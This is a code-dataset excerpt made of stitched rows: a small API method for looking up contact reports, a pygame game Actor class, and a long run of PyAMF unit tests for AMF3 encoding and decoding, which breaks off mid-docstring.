def __init__(self, data_svc, file_svc, contact_svc):
super().__init__(data_svc=data_svc, file_svc=file_svc)
self.contact_svc = contact_svc
def get_contact_report(self, contact: str = None):
contact = contact.upper()
if contact in self.contact_svc.report:
return self.contact_svc.report.get(contact)
raise JsonHttpNotFound(f'Contact not found: {contact}')
def get_available_contact_reports(self):
return list(self.contact_svc.report.keys())
|
10,527 | a74f40a5b793baab5efeea51a03788816c917c8e | import pygame
from display_object import *
class Actor(DisplayObject):
def __init__(self, name, x_pos, y_pos, size, hp, mp, str, defense, mag, gold, moves, direction, max_moves, max_hp, visible, image_path):
DisplayObject.__init__(self, name, x_pos, y_pos, size, visible, image_path)
self.str = str
self.defense = defense
self.hp = hp
self.mp = mp
self.mag = mag
self.gold = gold
self.inventory = []
self.up_img = None
self.down_img = None
self.left_img = None
self.right_img = None
self.direction = direction
self.moves = moves
self.max_moves = max_moves
self.max_hp = max_hp
|
10,528 | d4f5ded34c5f4ea2c282ff1329a9370b3d2f7c2b | # -*- coding: utf-8 -*-
#
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
Tests for AMF3 Implementation.
@since: 0.1.0
"""
import unittest
import datetime
import pyamf
from pyamf import amf3, util, xml, python
from pyamf.tests.util import (
Spam, EncoderMixIn, DecoderMixIn, ClassCacheClearingTestCase)
class MockAlias(object):
def __init__(self):
self.get_attributes = []
self.get_static_attrs = []
self.apply_attrs = []
self.static_attrs = {}
self.attrs = ({}, {})
self.create_instance = []
self.expected_instance = object()
def getStaticAttrs(self, *args, **kwargs):
self.get_static_attrs.append([args, kwargs])
return self.static_attrs
def getAttributes(self, *args, **kwargs):
self.get_attributes.append([args, kwargs])
return self.attrs
def createInstance(self, *args, **kwargs):
self.create_instance.append([args, kwargs])
return self.expected_instance
def applyAttributes(self, *args, **kwargs):
self.apply_attrs.append([args, kwargs])
class TypesTestCase(unittest.TestCase):
"""
Tests the type mappings.
"""
def test_types(self):
self.assertEqual(amf3.TYPE_UNDEFINED, b'\x00')
self.assertEqual(amf3.TYPE_NULL, b'\x01')
self.assertEqual(amf3.TYPE_BOOL_FALSE, b'\x02')
self.assertEqual(amf3.TYPE_BOOL_TRUE, b'\x03')
self.assertEqual(amf3.TYPE_INTEGER, b'\x04')
self.assertEqual(amf3.TYPE_NUMBER, b'\x05')
self.assertEqual(amf3.TYPE_STRING, b'\x06')
self.assertEqual(amf3.TYPE_XML, b'\x07')
self.assertEqual(amf3.TYPE_DATE, b'\x08')
self.assertEqual(amf3.TYPE_ARRAY, b'\x09')
self.assertEqual(amf3.TYPE_OBJECT, b'\x0a')
self.assertEqual(amf3.TYPE_XMLSTRING, b'\x0b')
self.assertEqual(amf3.TYPE_BYTEARRAY, b'\x0c')
class ContextTestCase(ClassCacheClearingTestCase):
def test_create(self):
c = amf3.Context()
self.assertEqual(c.strings, [])
self.assertEqual(c.classes, {})
self.assertEqual(len(c.strings), 0)
self.assertEqual(len(c.classes), 0)
def test_add_string(self):
x = amf3.Context()
y = b'abc'
self.assertEqual(x.addString(y), 0)
self.assertTrue(y in x.strings)
self.assertEqual(len(x.strings), 1)
self.assertEqual(x.addString(''), -1)
self.assertRaises(TypeError, x.addString, 132)
def test_add_class(self):
x = amf3.Context()
alias = pyamf.register_class(Spam, 'spam.eggs')
y = amf3.ClassDefinition(alias)
self.assertEqual(x.addClass(y, Spam), 0)
self.assertEqual(x.classes, {Spam: y})
self.assertEqual(x.class_ref, {0: y})
self.assertEqual(len(x.class_ref), 1)
def test_clear(self):
x = amf3.Context()
y = [1, 2, 3]
x.addObject(y)
x.addString('spameggs')
x.clear()
self.assertEqual(x.strings, [])
self.assertEqual(len(x.strings), 0)
self.assertFalse('spameggs' in x.strings)
def test_get_by_reference(self):
x = amf3.Context()
y = [1, 2, 3]
z = {'spam': 'eggs'}
alias_spam = pyamf.register_class(Spam, 'spam.eggs')
class Foo:
pass
class Bar:
pass
alias_foo = pyamf.register_class(Foo, 'foo.bar')
a = amf3.ClassDefinition(alias_spam)
b = amf3.ClassDefinition(alias_foo)
x.addObject(y)
x.addObject(z)
x.addString(b'abc')
x.addString(b'def')
x.addClass(a, Foo)
x.addClass(b, Bar)
self.assertEqual(x.getObject(0), y)
self.assertEqual(x.getObject(1), z)
self.assertEqual(x.getObject(2), None)
self.assertRaises(TypeError, x.getObject, b'')
self.assertRaises(TypeError, x.getObject, 2.2323)
self.assertEqual(x.getString(0), b'abc')
self.assertEqual(x.getString(1), b'def')
self.assertEqual(x.getString(2), None)
self.assertRaises(TypeError, x.getString, b'')
self.assertRaises(TypeError, x.getString, 2.2323)
self.assertEqual(x.getClass(Foo), a)
self.assertEqual(x.getClass(Bar), b)
self.assertEqual(x.getClass(2), None)
self.assertEqual(x.getClassByReference(0), a)
self.assertEqual(x.getClassByReference(1), b)
self.assertEqual(x.getClassByReference(2), None)
self.assertEqual(x.getObject(2), None)
self.assertEqual(x.getString(2), None)
self.assertEqual(x.getClass(2), None)
self.assertEqual(x.getClassByReference(2), None)
def test_get_reference(self):
x = amf3.Context()
y = [1, 2, 3]
z = {'spam': 'eggs'}
spam_alias = pyamf.register_class(Spam, 'spam.eggs')
class Foo:
pass
foo_alias = pyamf.register_class(Foo, 'foo.bar')
a = amf3.ClassDefinition(spam_alias)
b = amf3.ClassDefinition(foo_alias)
ref1 = x.addObject(y)
ref2 = x.addObject(z)
x.addString(b'abc')
x.addString(b'def')
x.addClass(a, Spam)
x.addClass(b, Foo)
self.assertEqual(x.getObjectReference(y), ref1)
self.assertEqual(x.getObjectReference(z), ref2)
self.assertEqual(x.getObjectReference({}), -1)
self.assertEqual(x.getStringReference(b'abc'), 0)
self.assertEqual(x.getStringReference(b'def'), 1)
self.assertEqual(x.getStringReference(b'asdfas'), -1)
self.assertEqual(x.getClass(Spam), a)
self.assertEqual(x.getClass(Foo), b)
self.assertEqual(x.getClass(object()), None)
class ClassDefinitionTestCase(ClassCacheClearingTestCase):
def setUp(self):
ClassCacheClearingTestCase.setUp(self)
self.alias = pyamf.ClassAlias(Spam, defer=True)
def test_dynamic(self):
self.assertFalse(self.alias.is_compiled())
x = amf3.ClassDefinition(self.alias)
self.assertTrue(x.alias is self.alias)
self.assertEqual(x.encoding, 2)
self.assertEqual(x.attr_len, 0)
self.assertTrue(self.alias.is_compiled())
def test_static(self):
self.alias.static_attrs = ['foo', 'bar']
self.alias.dynamic = False
x = amf3.ClassDefinition(self.alias)
self.assertTrue(x.alias is self.alias)
self.assertEqual(x.encoding, 0)
self.assertEqual(x.attr_len, 2)
def test_mixed(self):
self.alias.static_attrs = ['foo', 'bar']
x = amf3.ClassDefinition(self.alias)
self.assertTrue(x.alias is self.alias)
self.assertEqual(x.encoding, 2)
self.assertEqual(x.attr_len, 2)
def test_external(self):
self.alias.external = True
x = amf3.ClassDefinition(self.alias)
self.assertTrue(x.alias is self.alias)
self.assertEqual(x.encoding, 1)
self.assertEqual(x.attr_len, 0)
class EncoderTestCase(ClassCacheClearingTestCase, EncoderMixIn):
"""
Tests the output from the AMF3 L{Encoder<pyamf.amf3.Encoder>} class.
"""
amf_type = pyamf.AMF3
def setUp(self):
ClassCacheClearingTestCase.setUp(self)
EncoderMixIn.setUp(self)
def test_list_references(self):
y = [0, 1, 2, 3]
self.assertEncoded(y, b'\x09\x09\x01\x04\x00\x04\x01\x04\x02\x04\x03')
self.assertEncoded(y, b'\x09\x00', clear=False)
self.assertEncoded(y, b'\x09\x00', clear=False)
def test_list_proxy_references(self):
self.encoder.use_proxies = True
y = [0, 1, 2, 3]
self.assertEncoded(
y,
b'\n\x07Cflex.messaging.io.ArrayCollection\t\t\x01\x04\x00\x04\x01'
b'\x04\x02\x04\x03'
)
self.assertEncoded(y, b'\n\x00', clear=False)
self.assertEncoded(y, b'\n\x00', clear=False)
def test_dict(self):
self.assertEncoded({'spam': 'eggs'}, b'\n\x0b\x01\tspam\x06\teggs\x01')
self.assertEncoded(
{'a': u'e', 'b': u'f', 'c': u'g', 'd': u'h'},
b'\n\x0b\x01', (
b'\x03c\x06\x03g',
b'\x03b\x06\x03f',
b'\x03a\x06\x03e',
b'\x03d\x06\x03h'
),
b'\x01'
)
self.assertEncoded({12: True, 42: "Testing"},
b'\n\x0b\x01',
(
b'\x0512\x03',
b'\x0542\x06\x0fTesting',
),
b'\x01')
def test_boolean(self):
self.assertEncoded(True, b'\x03')
self.assertEncoded(False, b'\x02')
def test_mixed_array(self):
x = pyamf.MixedArray()
x.update({0: u'hello', 'spam': u'eggs'})
self.assertEncoded(x, b'\t\x03\tspam\x06\teggs\x01\x06\x0bhello')
x = pyamf.MixedArray()
x.update({0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 'a': 'a'})
self.assertEncoded(
x,
b'\x09\x0d\x03\x61\x06\x00\x01\x04\x00\x04\x01\x04\x02\x04\x03\x04'
b'\x04\x04\x05'
)
def test_empty_key_string(self):
"""
Test to see if there is an empty key in the C{dict}. There is a design
bug in Flash 9 which means that it cannot read this specific data.
@bug: See U{http://www.docuverse.com/blog/donpark/2007/05/14/
flash-9-amf3-bug}
for more info.
"""
def x():
y = pyamf.MixedArray()
y.update({'': 1, 0: 1})
self.encode(y)
self.assertRaises(pyamf.EncodeError, x)
def test_object(self):
try:
self.assertEncoded(
{'a': u'spam', 'b': 5},
b'\n\x0b\x01\x03a\x06\tspam\x03b\x04\x05\x01'
)
except:
self.assertEncoded(
{'a': u'spam', 'b': 5},
b'\n\x0b\x01\x03b\x04\x05\x03a\x06\tspam\x01'
)
pyamf.register_class(Spam, 'org.pyamf.spam')
obj = Spam()
obj.baz = 'hello'
self.assertEncoded(
obj,
b'\n\x0b\x1dorg.pyamf.spam\x07baz\x06\x0bhello\x01'
)
def test_date(self):
x = datetime.datetime(2005, 3, 18, 1, 58, 31)
self.assertEncoded(x, b'\x08\x01Bp+6!\x15\x80\x00')
self.assertEncoded(x, b'\x08\x00', clear=False)
self.assertRaises(pyamf.EncodeError, self.encode, datetime.time(22, 3))
def test_byte_array(self):
self.assertEncoded(amf3.ByteArray('hello'), b'\x0c\x0bhello')
def test_xmlstring(self):
x = xml.fromstring('<a><b>hello world</b></a>')
self.assertEqual(self.encode(x), b'\x0b\x33<a><b>hello world</b></a>')
self.assertEqual(self.encode(x), b'\x0b\x00')
def test_anonymous(self):
pyamf.register_class(Spam)
x = Spam({'spam': 'eggs'})
self.assertEncoded(x, b'\n\x0b\x01\x09spam\x06\x09eggs\x01')
def test_custom_type(self):
def write_as_list(list_interface_obj, encoder):
list_interface_obj.ran = True
self.assertEqual(id(self.encoder), id(encoder))
return list(list_interface_obj)
class ListWrapper(object):
ran = False
def __iter__(self):
return iter([1, 2, 3])
pyamf.add_type(ListWrapper, write_as_list)
x = ListWrapper()
self.assertEncoded(x, b'\t\x07\x01\x04\x01\x04\x02\x04\x03')
self.assertTrue(x.ran)
def test_old_style_classes(self):
class Person:
pass
pyamf.register_class(Person, 'spam.eggs.Person')
u = Person()
u.family_name = 'Doe'
u.given_name = 'Jane'
self.assertEncoded(u, b'\n\x0b!spam.eggs.Person', (
b'\x17family_name\x06\x07Doe', b'\x15given_name\x06\tJane'), b'\x01')
def test_slots(self):
class Person(object):
__slots__ = ('family_name', 'given_name')
u = Person()
u.family_name = 'Doe'
u.given_name = 'Jane'
self.assertEncoded(
u,
b'\n\x0b\x01', (
b'\x17family_name\x06\x07Doe',
b'\x15given_name\x06\tJane'
),
b'\x01'
)
def test_slots_registered(self):
class Person(object):
__slots__ = ('family_name', 'given_name')
pyamf.register_class(Person, 'spam.eggs.Person')
u = Person()
u.family_name = 'Doe'
u.given_name = 'Jane'
self.assertEncoded(u, b'\n\x0b!spam.eggs.Person', (
b'\x17family_name\x06\x07Doe', b'\x15given_name\x06\tJane'), b'\x01')
def test_elementtree_tag(self):
class NotAnElement(object):
def items(self):
return []
def __iter__(self):
return iter([])
foo = NotAnElement()
foo.tag = 'foo'
foo.text = 'bar'
foo.tail = None
self.assertEncoded(
foo,
b'\n\x0b\x01', (
b'\ttext\x06\x07bar',
b'\ttail\x01',
b'\x07tag\x06\x07foo'
),
b'\x01'
)
def test_funcs(self):
def x():
pass
for f in (chr, lambda x: x, x, pyamf, ''.startswith):
self.assertRaises(pyamf.EncodeError, self.encode, f)
def test_29b_ints(self):
"""
Tests for ints that don't fit into 29bits. Reference: #519
"""
ints = [
(amf3.MIN_29B_INT - 1, b'\x05\xc1\xb0\x00\x00\x01\x00\x00\x00'),
(amf3.MAX_29B_INT + 1, b'\x05A\xb0\x00\x00\x00\x00\x00\x00')
]
for i, val in ints:
self.buf.truncate()
self.encoder.writeElement(i)
self.assertEqual(self.buf.getvalue(), val)
def test_number(self):
vals = [
(0, b'\x04\x00'),
(0.2, b'\x05\x3f\xc9\x99\x99\x99\x99\x99\x9a'),
(1, b'\x04\x01'),
(127, b'\x04\x7f'),
(128, b'\x04\x81\x00'),
(0x3fff, b'\x04\xff\x7f'),
(0x4000, b'\x04\x81\x80\x00'),
(0x1FFFFF, b'\x04\xff\xff\x7f'),
(0x200000, b'\x04\x80\xc0\x80\x00'),
(0x3FFFFF, b'\x04\x80\xff\xff\xff'),
(0x400000, b'\x04\x81\x80\x80\x00'),
(-1, b'\x04\xff\xff\xff\xff'),
(42, b'\x04\x2a'),
(-123, b'\x04\xff\xff\xff\x85'),
(amf3.MIN_29B_INT, b'\x04\xc0\x80\x80\x00'),
(amf3.MAX_29B_INT, b'\x04\xbf\xff\xff\xff'),
(1.23456789, b'\x05\x3f\xf3\xc0\xca\x42\x83\xde\x1b')
]
for i, val in vals:
self.buf.truncate()
self.encoder.writeElement(i)
self.assertEqual(self.buf.getvalue(), val)
def test_class(self):
class New(object):
pass
class Classic:
pass
with self.assertRaises(pyamf.EncodeError):
self.encoder.writeElement(Classic)
with self.assertRaises(pyamf.EncodeError):
self.encoder.writeElement(New)
def test_proxy(self):
"""
Test to ensure that only C{dict} objects will be proxied correctly
"""
self.encoder.use_proxies = True
bytes = b'\n\x07;flex.messaging.io.ObjectProxy\n\x0b\x01\x01'
self.assertEncoded(pyamf.ASObject(), bytes)
self.assertEncoded({}, bytes)
def test_proxy_non_dict(self):
class Foo(object):
pass
self.encoder.use_proxies = True
bytes = b'\n\x0b\x01\x01'
self.assertEncoded(Foo(), bytes)
def test_timezone(self):
d = datetime.datetime(2009, 9, 24, 14, 23, 23)
self.encoder.timezone_offset = datetime.timedelta(hours=-5)
self.encoder.writeElement(d)
self.assertEqual(
self.buf.getvalue(),
b'\x08\x01Br>\xd8\x1f\xff\x80\x00'
)
def test_generator(self):
def foo():
yield [1, 2, 3]
yield u'\xff'
yield pyamf.Undefined
self.assertEncoded(
foo(),
b'\t\x07\x01\x04\x01\x04\x02\x04\x03\x06\x05'
b'\xc3\xbf\x00'
)
def test_iterate(self):
self.assertRaises(StopIteration, self.encoder.__next__)
self.encoder.send('')
self.encoder.send('hello')
self.encoder.send(u'ƒøø')
self.assertEqual(next(self.encoder), b'\x06\x01')
self.assertEqual(next(self.encoder), b'\x06\x0bhello')
self.assertEqual(next(self.encoder), b'\x06\r\xc6\x92\xc3\xb8\xc3\xb8')
self.assertRaises(StopIteration, self.encoder.__next__)
self.assertIdentical(iter(self.encoder), self.encoder)
self.assertEqual(
self.buf.getvalue(),
b'\x06\x01\x06\x0bhello\x06\r\xc6\x92\xc3\xb8\xc3\xb8'
)
def test_subclassed_tuple(self):
"""
A subclassed tuple must encode an AMF list.
@see: #830
"""
class Foo(tuple):
pass
x = Foo([1, 2])
self.encoder.send(x)
self.assertEqual(next(self.encoder), b'\t\x05\x01\x04\x01\x04\x02')
class DecoderTestCase(ClassCacheClearingTestCase, DecoderMixIn):
"""
Tests the output from the AMF3 L{Decoder<pyamf.amf3.Decoder>} class.
"""
amf_type = pyamf.AMF3
def setUp(self):
ClassCacheClearingTestCase.setUp(self)
DecoderMixIn.setUp(self)
def test_undefined(self):
self.assertDecoded(pyamf.Undefined, b'\x00')
def test_number(self):
self.assertDecoded(0, b'\x04\x00')
self.assertDecoded(0.2, b'\x05\x3f\xc9\x99\x99\x99\x99\x99\x9a')
self.assertDecoded(1, b'\x04\x01')
self.assertDecoded(-1, b'\x04\xff\xff\xff\xff')
self.assertDecoded(42, b'\x04\x2a')
# two ways to represent -123, as an int and as a float
self.assertDecoded(-123, b'\x04\xff\xff\xff\x85')
self.assertDecoded(-123, b'\x05\xc0\x5e\xc0\x00\x00\x00\x00\x00')
self.assertDecoded(1.23456789, b'\x05\x3f\xf3\xc0\xca\x42\x83\xde\x1b')
def test_integer(self):
self.assertDecoded(0, b'\x04\x00')
self.assertDecoded(0x35, b'\x04\x35')
self.assertDecoded(0x7f, b'\x04\x7f')
self.assertDecoded(0x80, b'\x04\x81\x00')
self.assertDecoded(0xd4, b'\x04\x81\x54')
self.assertDecoded(0x3fff, b'\x04\xff\x7f')
self.assertDecoded(0x4000, b'\x04\x81\x80\x00')
self.assertDecoded(0x1a53f, b'\x04\x86\xca\x3f')
self.assertDecoded(0x1fffff, b'\x04\xff\xff\x7f')
self.assertDecoded(0x200000, b'\x04\x80\xc0\x80\x00')
self.assertDecoded(-0x01, b'\x04\xff\xff\xff\xff')
self.assertDecoded(-0x2a, b'\x04\xff\xff\xff\xd6')
self.assertDecoded(0xfffffff, b'\x04\xbf\xff\xff\xff')
self.assertDecoded(-0x10000000, b'\x04\xc0\x80\x80\x00')
def test_infinites(self):
x = self.decode(b'\x05\xff\xf8\x00\x00\x00\x00\x00\x00')
self.assertTrue(python.isNaN(x))
x = self.decode(b'\x05\xff\xf0\x00\x00\x00\x00\x00\x00')
self.assertTrue(python.isNegInf(x))
x = self.decode(b'\x05\x7f\xf0\x00\x00\x00\x00\x00\x00')
self.assertTrue(python.isPosInf(x))
def test_boolean(self):
self.assertDecoded(True, b'\x03')
self.assertDecoded(False, b'\x02')
def test_null(self):
self.assertDecoded(None, b'\x01')
def test_string(self):
self.assertDecoded('', b'\x06\x01')
self.assertDecoded('hello', b'\x06\x0bhello')
self.assertDecoded(
u'ღმერთსი შემვედრე, ნუთუ კვლა დამხსნას სოფლისა შრომასა, ცეცხლს',
b'\x06\x82\x45\xe1\x83\xa6\xe1\x83\x9b\xe1\x83\x94\xe1\x83\xa0'
b'\xe1\x83\x97\xe1\x83\xa1\xe1\x83\x98\x20\xe1\x83\xa8\xe1\x83'
b'\x94\xe1\x83\x9b\xe1\x83\x95\xe1\x83\x94\xe1\x83\x93\xe1\x83'
b'\xa0\xe1\x83\x94\x2c\x20\xe1\x83\x9c\xe1\x83\xa3\xe1\x83\x97'
b'\xe1\x83\xa3\x20\xe1\x83\x99\xe1\x83\x95\xe1\x83\x9a\xe1\x83'
b'\x90\x20\xe1\x83\x93\xe1\x83\x90\xe1\x83\x9b\xe1\x83\xae\xe1'
b'\x83\xa1\xe1\x83\x9c\xe1\x83\x90\xe1\x83\xa1\x20\xe1\x83\xa1'
b'\xe1\x83\x9d\xe1\x83\xa4\xe1\x83\x9a\xe1\x83\x98\xe1\x83\xa1'
b'\xe1\x83\x90\x20\xe1\x83\xa8\xe1\x83\xa0\xe1\x83\x9d\xe1\x83'
b'\x9b\xe1\x83\x90\xe1\x83\xa1\xe1\x83\x90\x2c\x20\xe1\x83\xaa'
b'\xe1\x83\x94\xe1\x83\xaa\xe1\x83\xae\xe1\x83\x9a\xe1\x83\xa1')
def test_mixed_array(self):
y = self.decode(
b'\x09\x09\x03\x62\x06\x00\x03\x64\x06\x02\x03\x61'
b'\x06\x04\x03\x63\x06\x06\x01\x04\x00\x04\x01\x04\x02\x04\x03'
)
self.assertTrue(isinstance(y, pyamf.MixedArray))
self.assertEqual(y, {
'a': u'a',
'b': u'b',
'c': u'c',
'd': u'd',
0: 0,
1: 1,
2: 2,
3: 3
})
def test_string_references(self):
self.assertDecoded('hello', b'\x06\x0bhello')
self.assertDecoded('hello', b'\x06\x00', clear=False)
self.assertDecoded('hello', b'\x06\x00', clear=False)
def test_xmlstring(self):
self.buf.write(b'\x0b\x33<a><b>hello world</b></a>')
self.buf.seek(0, 0)
x = self.decoder.readElement()
self.assertEqual(xml.tostring(x), b'<a><b>hello world</b></a>')
self.buf.truncate()
self.buf.write(b'\x0b\x00')
self.buf.seek(0, 0)
y = self.decoder.readElement()
self.assertEqual(x, y)
def test_xmlstring_references(self):
self.buf.write(b'\x0b\x33<a><b>hello world</b></a>\x0b\x00')
self.buf.seek(0, 0)
x = self.decoder.readElement()
y = self.decoder.readElement()
self.assertEqual(id(x), id(y))
def test_list(self):
self.assertDecoded([], b'\x09\x01\x01')
self.assertDecoded(
[0, 1, 2, 3],
b'\x09\x09\x01\x04\x00\x04\x01\x04\x02\x04\x03'
)
self.assertDecoded(
["Hello", 2, 3, 4, 5],
b'\x09\x0b\x01\x06\x0b\x48\x65\x6c\x6c\x6f\x04\x02\x04\x03\x04\x04'
b'\x04\x05'
)
def test_list_references(self):
y = [0, 1, 2, 3]
z = [0, 1, 2]
self.assertDecoded(y, b'\x09\x09\x01\x04\x00\x04\x01\x04\x02\x04\x03')
self.assertDecoded(y, b'\x09\x00', clear=False)
self.assertDecoded(
z,
b'\x09\x07\x01\x04\x00\x04\x01\x04\x02',
clear=False
)
self.assertDecoded(z, b'\x09\x02', clear=False)
def test_dict(self):
self.assertDecoded(
{'a': u'a', 'b': u'b', 'c': u'c', 'd': u'd'},
b'\n\x0b\x01\x03a\x06\x00\x03c\x06\x02\x03b\x06\x04\x03d\x06\x06'
b'\x01'
)
self.assertDecoded(
{0: u'hello', 'foo': u'bar'},
b'\x09\x03\x07\x66\x6f\x6f\x06\x07\x62\x61\x72\x01\x06\x0b\x68\x65'
b'\x6c\x6c\x6f'
)
self.assertDecoded(
{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 'a': 'a'},
b'\x09\x0d\x03\x61\x06\x00\x01\x04\x00\x04\x01\x04\x02\x04\x03\x04'
b'\x04\x04\x05'
)
self.assertDecoded(
{
'a': u'a',
'b': u'b',
'c': u'c',
'd': u'd',
0: 0,
1: 1,
2: 2,
3: 3
},
b'\x09\x09\x03\x62\x06\x00\x03\x64\x06\x02\x03\x61\x06\x04\x03\x63'
b'\x06\x06\x01\x04\x00\x04\x01\x04\x02\x04\x03'
)
self.assertDecoded(
{'a': 1, 'b': 2},
b'\x0a\x0b\x01\x03\x62\x04\x02\x03\x61\x04\x01\x01'
)
self.assertDecoded(
{'baz': u'hello'},
b'\x0a\x0b\x01\x07\x62\x61\x7a\x06\x0b\x68\x65\x6c\x6c\x6f\x01'
)
self.assertDecoded(
{'baz': u'hello'},
b'\x0a\x13\x01\x07\x62\x61\x7a\x06\x0b\x68\x65\x6c\x6c\x6f'
)
bytes = b'\x0a\x0b\x01\x07\x62\x61\x7a\x06\x0b\x68\x65\x6c\x6c\x6f\x01'
self.buf.write(bytes)
self.buf.seek(0)
self.decoder.readElement()
def test_object(self):
pyamf.register_class(Spam, 'org.pyamf.spam')
self.buf.truncate(0)
self.buf.write(
b'\x0a\x13\x1dorg.pyamf.spam\x07baz\x06\x0b\x68\x65\x6c\x6c\x6f')
self.buf.seek(0)
obj = self.decoder.readElement()
self.assertEqual(obj.__class__, Spam)
self.assertTrue(hasattr(obj, 'baz'))
self.assertEqual(obj.baz, 'hello')
def test_byte_array(self):
self.assertDecoded(amf3.ByteArray('hello'), b'\x0c\x0bhello')
def test_date(self):
import datetime
self.assertDecoded(
datetime.datetime(2005, 3, 18, 1, 58, 31),
b'\x08\x01Bp+6!\x15\x80\x00'
)
def test_not_strict(self):
self.assertFalse(self.decoder.strict)
# write a typed object to the stream
self.buf.write('\n\x0b\x13spam.eggs\x07foo\x06\x07bar\x01')
self.buf.seek(0)
self.assertFalse('spam.eggs' in pyamf.CLASS_CACHE)
obj = self.decoder.readElement()
self.assertTrue(isinstance(obj, pyamf.TypedObject))
self.assertEqual(obj.alias, 'spam.eggs')
self.assertEqual(obj, {'foo': 'bar'})
def test_strict(self):
self.decoder.strict = True
self.assertTrue(self.decoder.strict)
# write a typed object to the stream
self.buf.write('\n\x0b\x13spam.eggs\x07foo\x06\x07bar\x01')
self.buf.seek(0)
self.assertFalse('spam.eggs' in pyamf.CLASS_CACHE)
self.assertRaises(pyamf.UnknownClassAlias, self.decoder.readElement)
def test_slots(self):
class Person(object):
__slots__ = ('family_name', 'given_name')
pyamf.register_class(Person, 'spam.eggs.Person')
self.buf.write(
b'\n+!spam.eggs.Person\x17family_name\x15given_name\x06'
b'\x07Doe\x06\tJane\x02\x06\x06\x04\x06\x08\x01'
)
self.buf.seek(0)
foo = self.decoder.readElement()
self.assertTrue(isinstance(foo, Person))
self.assertEqual(foo.family_name, 'Doe')
self.assertEqual(foo.given_name, 'Jane')
self.assertEqual(self.buf.remaining(), 0)
def test_default_proxy_flag(self):
amf3.use_proxies_default = True
decoder = amf3.Decoder(self.buf, context=self.context)
self.assertTrue(decoder.use_proxies)
amf3.use_proxies_default = False
decoder = amf3.Decoder(self.buf, context=self.context)
self.assertFalse(decoder.use_proxies)
def test_ioerror_buffer_position(self):
"""
Test to ensure that if an IOError is raised by `readElement` that
the original position of the stream is restored.
"""
bytes = pyamf.encode(u'foo', [1, 2, 3], encoding=pyamf.AMF3).getvalue()
self.buf.write(bytes[:-1])
self.buf.seek(0)
self.decoder.readElement()
self.assertEqual(self.buf.tell(), 5)
self.assertRaises(IOError, self.decoder.readElement)
self.assertEqual(self.buf.tell(), 5)
def test_timezone(self):
self.decoder.timezone_offset = datetime.timedelta(hours=-5)
self.buf.write(b'\x08\x01Br>\xc6\xf5w\x80\x00')
self.buf.seek(0)
f = self.decoder.readElement()
self.assertEqual(f, datetime.datetime(2009, 9, 24, 9, 23, 23))
def test_iterate(self):
self.assertRaises(StopIteration, self.decoder.__next__)
self.decoder.send(b'\x01')
self.decoder.send(b'\x03')
self.decoder.send(b'\x02')
self.assertEqual(next(self.decoder), None)
self.assertEqual(next(self.decoder), True)
self.assertEqual(next(self.decoder), False)
self.assertRaises(StopIteration, self.decoder.__next__)
self.assertIdentical(iter(self.decoder), self.decoder)
def test_bad_type(self):
self.assertRaises(pyamf.DecodeError, self.decode, b'\xff')
def test_kwargs(self):
"""
Python <= 3 demand that kwargs keys be bytes instead of unicode/string.
"""
def f(**kwargs):
self.assertEqual(kwargs, {'spam': 'eggs'})
kwargs = self.decode('\n\x0b\x01\tspam\x06\teggs\x01')
f(**kwargs)
def test_post_process(self):
"""
Ensure that postprocessing happens when data has been decoded.
"""
self.executed = False
post_procs = pyamf.POST_DECODE_PROCESSORS[:]
def restore_post_procs():
pyamf.POST_DECODE_PROCESSORS = post_procs
self.addCleanup(restore_post_procs)
pyamf.POST_DECODE_PROCESSORS = []
def postprocess(payload, context):
self.assertEqual(payload, u'foo')
self.assertEqual(context, {})
self.executed = True
return payload
pyamf.add_post_decode_processor(postprocess)
# setup complete
bytes = pyamf.encode(u'foo', encoding=pyamf.AMF3).getvalue()
self.decoder.send(bytes)
ret = next(self.decoder)
self.assertTrue(self.executed)
self.assertEqual(ret, u'foo')
class ObjectEncodingTestCase(ClassCacheClearingTestCase, EncoderMixIn):
"""
"""
amf_type = pyamf.AMF3
def setUp(self):
ClassCacheClearingTestCase.setUp(self)
EncoderMixIn.setUp(self)
def test_object_references(self):
obj = pyamf.ASObject(a='b')
self.encoder.writeElement(obj)
pos = self.buf.tell()
self.encoder.writeElement(obj)
self.assertEqual(self.buf.getvalue()[pos:], b'\x0a\x00')
self.buf.truncate()
self.encoder.writeElement(obj)
self.assertEqual(self.buf.getvalue(), b'\x0a\x00')
self.buf.truncate()
def test_class_references(self):
alias = pyamf.register_class(Spam, 'abc.xyz')
x = Spam({'spam': 'eggs'})
y = Spam({'foo': 'bar'})
self.encoder.writeElement(x)
cd = self.context.getClass(Spam)
self.assertTrue(cd.alias is alias)
self.assertEqual(
self.buf.getvalue(),
b'\n\x0b\x0fabc.xyz\tspam\x06\teggs\x01'
)
pos = self.buf.tell()
self.encoder.writeElement(y)
self.assertEqual(
self.buf.getvalue()[pos:],
b'\n\x01\x07foo\x06\x07bar\x01'
)
def test_static(self):
alias = pyamf.register_class(Spam, 'abc.xyz')
alias.dynamic = False
x = Spam({'spam': 'eggs'})
self.encoder.writeElement(x)
self.assertEqual(self.buf.getvalue(), b'\n\x03\x0fabc.xyz')
pyamf.unregister_class(Spam)
self.buf.truncate()
self.encoder.context.clear()
alias = pyamf.register_class(Spam, 'abc.xyz')
alias.dynamic = False
alias.static_attrs = ['spam']
x = Spam({'spam': 'eggs', 'foo': 'bar'})
self.encoder.writeElement(x)
self.assertEqual(
self.buf.getvalue(),
b'\n\x13\x0fabc.xyz\tspam\x06\teggs'
)
def test_dynamic(self):
pyamf.register_class(Spam, 'abc.xyz')
x = Spam({'spam': 'eggs'})
self.encoder.writeElement(x)
self.assertEqual(
self.buf.getvalue(),
b'\n\x0b\x0fabc.xyz\tspam\x06\teggs\x01'
)
def test_combined(self):
alias = pyamf.register_class(Spam, 'abc.xyz')
alias.static_attrs = ['spam']
x = Spam({'spam': 'foo', 'eggs': 'bar'})
self.encoder.writeElement(x)
buf = self.buf.getvalue()
self.assertEqual(
buf,
b'\n\x1b\x0fabc.xyz\tspam\x06\x07foo\teggs\x06\x07bar\x01'
)
def test_external(self):
alias = pyamf.register_class(Spam, 'abc.xyz')
alias.external = True
x = Spam({'spam': 'eggs'})
self.encoder.writeElement(x)
buf = self.buf.getvalue()
# an inline object with and inline class-def, encoding = 0x01, 1 attr
self.assertEqual(buf[:2], b'\x0a\x07')
# class alias name
self.assertEqual(buf[2:10], b'\x0fabc.xyz')
self.assertEqual(len(buf), 10)
def test_anonymous_class_references(self):
"""
Test to ensure anonymous class references with static attributes
